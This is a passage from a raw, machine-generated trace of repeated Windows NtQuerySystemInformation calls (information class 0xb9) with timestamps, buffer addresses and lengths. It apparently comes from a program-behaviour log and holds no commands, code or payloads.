(SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0273.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] 